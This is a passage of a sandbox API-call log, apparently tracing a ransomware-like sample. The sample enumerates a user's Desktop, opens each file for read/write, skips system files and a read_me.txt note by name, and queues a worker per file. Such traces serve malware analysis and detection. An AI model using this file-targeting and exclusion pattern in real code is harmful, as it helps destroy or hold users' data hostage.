nFileSizeLow=0xce90, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="liVQHjNX2r.swf", cAlternateFileName="LIVQHJ~1.SWF")) returned 1 [0074.016] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\liVQHjNX2r.swf") returned 56 [0074.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\liVQHjNX2r.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\livqhjnx2r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x798 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="read_me.txt") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="autoexec.bat") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="desktop.ini") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="autorun.inf") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="ntuser.dat") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="iconcache.db") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="bootsect.bak") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="boot.ini") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="ntuser.dat.log") returned 0x0 [0074.016] StrStrW (lpFirst="livqhjnx2r.swf", lpSrch="thumbs.db") returned 0x0 [0074.016] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 16 [0074.016] QueueUserWorkItem (Function=0x404e00, Context=0x798, Flags=0x0) returned 1 [0074.016] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa26ede70, ftCreationTime.dwHighDateTime=0x1d4cc4d, ftLastAccessTime.dwLowDateTime=0x4e4d1360, ftLastAccessTime.dwHighDateTime=0x1d4cc49, ftLastWriteTime.dwLowDateTime=0x4e4d1360, ftLastWriteTime.dwHighDateTime=0x1d4cc49, nFileSizeHigh=0x0, nFileSizeLow=0x414e, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="llR6.pps", cAlternateFileName="")) returned 1 [0074.017] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\llR6.pps") returned 50 [0074.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\llR6.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\llr6.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78c [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="read_me.txt") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="autoexec.bat") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="desktop.ini") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="autorun.inf") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="ntuser.dat") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="iconcache.db") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="bootsect.bak") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="boot.ini") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="ntuser.dat.log") returned 0x0 [0074.017] StrStrW (lpFirst="llr6.pps", lpSrch="thumbs.db") returned 0x0 [0074.017] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 17 [0074.017] QueueUserWorkItem (Function=0x404e00, Context=0x78c, Flags=0x0) returned 1 [0074.017] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecbb1eb0, ftCreationTime.dwHighDateTime=0x1d4d3e3, ftLastAccessTime.dwLowDateTime=0x961cf330, ftLastAccessTime.dwHighDateTime=0x1d4cb32, ftLastWriteTime.dwLowDateTime=0x961cf330, ftLastWriteTime.dwHighDateTime=0x1d4cb32, nFileSizeHigh=0x0, nFileSizeLow=0x9eeb, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="lm8-Yxyd.wav", cAlternateFileName="")) returned 1 [0074.017] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lm8-Yxyd.wav") returned 54 [0074.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lm8-Yxyd.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lm8-yxyd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0074.017] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="read_me.txt") returned 0x0 [0074.017] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="autoexec.bat") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="desktop.ini") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="autorun.inf") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="ntuser.dat") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="iconcache.db") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="bootsect.bak") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="boot.ini") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="ntuser.dat.log") returned 0x0 [0074.018] StrStrW (lpFirst="lm8-yxyd.wav", lpSrch="thumbs.db") returned 0x0 [0074.018] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 18 [0074.018] QueueUserWorkItem (Function=0x404e00, Context=0x7a0, Flags=0x0) returned 1 [0074.018] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fc4ef80, ftCreationTime.dwHighDateTime=0x1d4c973, ftLastAccessTime.dwLowDateTime=0x95a6e300, ftLastAccessTime.dwHighDateTime=0x1d4d23c, ftLastWriteTime.dwLowDateTime=0x95a6e300, ftLastWriteTime.dwHighDateTime=0x1d4d23c, nFileSizeHigh=0x0, nFileSizeLow=0x15d87, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="NgqyPrC0ZV4fh.gif", cAlternateFileName="NGQYPR~1.GIF")) returned 1 [0074.018] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgqyPrC0ZV4fh.gif") returned 59 [0074.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgqyPrC0ZV4fh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngqyprc0zv4fh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7cc [0074.018] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="read_me.txt") returned 0x0 [0074.018] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="autoexec.bat") returned 0x0 [0074.018] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="desktop.ini") returned 0x0 [0074.018] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="autorun.inf") returned 0x0 [0074.018] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="ntuser.dat") returned 0x0 [0074.018] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="iconcache.db") returned 0x0 [0074.019] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="bootsect.bak") returned 0x0 [0074.019] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="boot.ini") returned 0x0 [0074.019] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="ntuser.dat.log") returned 0x0 [0074.019] StrStrW (lpFirst="ngqyprc0zv4fh.gif", lpSrch="thumbs.db") returned 0x0 [0074.019] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 19 [0074.019] QueueUserWorkItem (Function=0x404e00, Context=0x7cc, Flags=0x0) returned 1 [0074.019] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16164800, ftCreationTime.dwHighDateTime=0x1d4d3b4, ftLastAccessTime.dwLowDateTime=0x556cd2f0, ftLastAccessTime.dwHighDateTime=0x1d4d16e, ftLastWriteTime.dwLowDateTime=0x556cd2f0, ftLastWriteTime.dwHighDateTime=0x1d4d16e, nFileSizeHigh=0x0, nFileSizeLow=0xd18a, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="nSA7d4lyI1Ncal5FKUi.xls", cAlternateFileName="NSA7D4~1.XLS")) returned 1 [0074.019] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nSA7d4lyI1Ncal5FKUi.xls") returned 65 [0074.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nSA7d4lyI1Ncal5FKUi.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nsa7d4lyi1ncal5fkui.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="read_me.txt") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="autoexec.bat") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="desktop.ini") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="autorun.inf") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="ntuser.dat") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="iconcache.db") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="bootsect.bak") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="boot.ini") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="ntuser.dat.log") returned 0x0 [0074.019] StrStrW (lpFirst="nsa7d4lyi1ncal5fkui.xls", lpSrch="thumbs.db") returned 0x0 [0074.020] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 20 [0074.020] QueueUserWorkItem (Function=0x404e00, Context=0x7d0, Flags=0x0) returned 1 [0074.020] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85854d0, ftCreationTime.dwHighDateTime=0x1d4c832, ftLastAccessTime.dwLowDateTime=0x3b018f30, ftLastAccessTime.dwHighDateTime=0x1d4c5fe, ftLastWriteTime.dwLowDateTime=0x3b018f30, ftLastWriteTime.dwHighDateTime=0x1d4c5fe, nFileSizeHigh=0x0, nFileSizeLow=0xc7c2, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="qIOkRC-l.flv", cAlternateFileName="")) returned 1 [0074.020] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qIOkRC-l.flv") returned 54 [0074.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qIOkRC-l.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qiokrc-l.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d4 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="read_me.txt") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="autoexec.bat") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="desktop.ini") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="autorun.inf") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="ntuser.dat") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="iconcache.db") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="bootsect.bak") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="boot.ini") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="ntuser.dat.log") returned 0x0 [0074.020] StrStrW (lpFirst="qiokrc-l.flv", lpSrch="thumbs.db") returned 0x0 [0074.020] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 21 [0074.020] QueueUserWorkItem (Function=0x404e00, Context=0x7d4, Flags=0x0) returned 1 [0074.020] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ac0ef0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16ac0ef0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ac0ef0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.020] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt") returned 53 [0074.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d8 [0074.021] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.021] CloseHandle (hObject=0x7d8) returned 1 [0074.021] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e73d7a0, ftCreationTime.dwHighDateTime=0x1d4cd40, ftLastAccessTime.dwLowDateTime=0xb61b9360, ftLastAccessTime.dwHighDateTime=0x1d4d101, ftLastWriteTime.dwLowDateTime=0xb61b9360, ftLastWriteTime.dwHighDateTime=0x1d4d101, nFileSizeHigh=0x0, nFileSizeLow=0x9a91, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="tLYwebo5JKIgCR.avi", cAlternateFileName="TLYWEB~1.AVI")) returned 1 [0074.021] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tLYwebo5JKIgCR.avi") returned 60 [0074.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tLYwebo5JKIgCR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlywebo5jkigcr.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d8 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="read_me.txt") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="autoexec.bat") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="desktop.ini") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="autorun.inf") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="ntuser.dat") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="iconcache.db") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="bootsect.bak") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="boot.ini") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="ntuser.dat.log") returned 0x0 [0074.021] StrStrW (lpFirst="tlywebo5jkigcr.avi", lpSrch="thumbs.db") returned 0x0 [0074.021] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 22 [0074.021] QueueUserWorkItem (Function=0x404e00, Context=0x7d8, Flags=0x0) returned 1 [0074.021] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x796ca7b0, ftCreationTime.dwHighDateTime=0x1d4cd87, ftLastAccessTime.dwLowDateTime=0xf5d04430, ftLastAccessTime.dwHighDateTime=0x1d4cfc9, ftLastWriteTime.dwLowDateTime=0xf5d04430, ftLastWriteTime.dwHighDateTime=0x1d4cfc9, nFileSizeHigh=0x0, nFileSizeLow=0x5d4d, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="tyzbPSjZEG.avi", cAlternateFileName="TYZBPS~1.AVI")) returned 1 [0074.021] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tyzbPSjZEG.avi") returned 56 [0074.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tyzbPSjZEG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tyzbpsjzeg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="read_me.txt") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="autoexec.bat") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="desktop.ini") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="autorun.inf") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="ntuser.dat") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="iconcache.db") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="bootsect.bak") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="boot.ini") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="ntuser.dat.log") returned 0x0 [0074.022] StrStrW (lpFirst="tyzbpsjzeg.avi", lpSrch="thumbs.db") returned 0x0 [0074.022] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 23 [0074.022] QueueUserWorkItem (Function=0x404e00, Context=0x7dc, Flags=0x0) returned 1 [0074.022] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a0d470, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x79d9dd0, ftLastAccessTime.dwHighDateTime=0x1d4d078, ftLastWriteTime.dwLowDateTime=0x79d9dd0, ftLastWriteTime.dwHighDateTime=0x1d4d078, nFileSizeHigh=0x0, nFileSizeLow=0x8448, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="V8ri.swf", cAlternateFileName="")) returned 1 [0074.022] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V8ri.swf") returned 50 [0074.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V8ri.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v8ri.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="read_me.txt") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="autoexec.bat") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="desktop.ini") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="autorun.inf") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="ntuser.dat") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="iconcache.db") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="bootsect.bak") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="boot.ini") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="ntuser.dat.log") returned 0x0 [0074.023] StrStrW (lpFirst="v8ri.swf", lpSrch="thumbs.db") returned 0x0 [0074.023] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 24 [0074.023] QueueUserWorkItem (Function=0x404e00, Context=0x7e0, Flags=0x0) returned 1 [0074.023] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9067670, ftCreationTime.dwHighDateTime=0x1d4d046, ftLastAccessTime.dwLowDateTime=0x9bf7cd10, ftLastAccessTime.dwHighDateTime=0x1d4c74b, ftLastWriteTime.dwLowDateTime=0x9bf7cd10, ftLastWriteTime.dwHighDateTime=0x1d4c74b, nFileSizeHigh=0x0, nFileSizeLow=0x17981, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="vDRPByO651DdDfm.mp3", cAlternateFileName="VDRPBY~1.MP3")) returned 1 [0074.023] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vDRPByO651DdDfm.mp3") returned 61 [0074.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vDRPByO651DdDfm.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vdrpbyo651dddfm.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e4 [0074.023] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="read_me.txt") returned 0x0 [0074.023] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="autoexec.bat") returned 0x0 [0074.023] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="desktop.ini") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="autorun.inf") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="ntuser.dat") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="iconcache.db") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="bootsect.bak") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="boot.ini") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0074.024] StrStrW (lpFirst="vdrpbyo651dddfm.mp3", lpSrch="thumbs.db") returned 0x0 [0074.024] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 25 [0074.024] QueueUserWorkItem (Function=0x404e00, Context=0x7e4, Flags=0x0) returned 1 [0074.024] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a22c80, ftCreationTime.dwHighDateTime=0x1d59ffd, ftLastAccessTime.dwLowDateTime=0xf0a22c80, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xeed86900, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x3ac00, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="Wacatac_2019-11-20_23-34.exe", cAlternateFileName="WACATA~1.EXE")) returned 1 [0074.024] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe") returned 70 [0074.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wacatac_2019-11-20_23-34.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.024] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181b2ac0, ftCreationTime.dwHighDateTime=0x1d4cad7, ftLastAccessTime.dwLowDateTime=0x6553f70, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x6553f70, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0x11e51, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="WiGeM.gif", cAlternateFileName="")) returned 1 [0074.024] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WiGeM.gif") returned 51 [0074.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WiGeM.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wigem.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e8 [0074.024] StrStrW (lpFirst="wigem.gif", lpSrch="read_me.txt") returned 0x0 [0074.024] StrStrW (lpFirst="wigem.gif", lpSrch="autoexec.bat") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="desktop.ini") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="autorun.inf") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="ntuser.dat") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", 